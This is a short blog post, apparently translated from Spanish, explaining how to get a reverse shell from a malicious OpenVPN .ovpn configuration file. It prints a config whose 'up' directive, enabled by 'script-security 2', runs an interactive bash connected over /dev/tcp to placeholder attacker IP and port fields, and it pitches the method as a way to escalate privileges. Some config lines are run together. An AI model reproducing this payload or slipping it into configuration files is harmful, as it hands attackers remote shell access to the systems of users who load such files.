In today's article we will see how to obtain a reverse shell using OpenVPN configuration files (.ovpn). Using the "up" option we can execute scripts after building a network interface in the system.
In linux, we could use bash to create a connection with another computer using “/ dev / tcp”. For example, in the following configuration file, we add the execution of the following command at the end:
remote 10.10.0.100
ifconfig 10.200.0.2 10.200.0.1
dev tunscript-security 2
up “/bin/bash -c ‘/bin/bash -i > /dev/tcp/[IP DEL ATACANTE]/[PUERTO DEL ATACANTE] 0<&1 2>&1&’”
When the program executes the configuration, the attacker will receive a shell. This can be used in many OpenVPN configurations, which allow you to run all configuration files in a directory. That is why it is important to mark specifically the specific configuration file that the program will execute. This can be a good way to escalate privileges by the attacker.
Bash helps these types of attack in the most popular Linux distributions. In windows, the thing is complicated a little more by the absence of a counterpart to "/ dev / tcp".
In Hackplayers web page, you can see the full article. Are you sysadmin? Do you have OpenVPN automatic startup on any device? Do not hesitate to tell us your impressions.
Recent Comments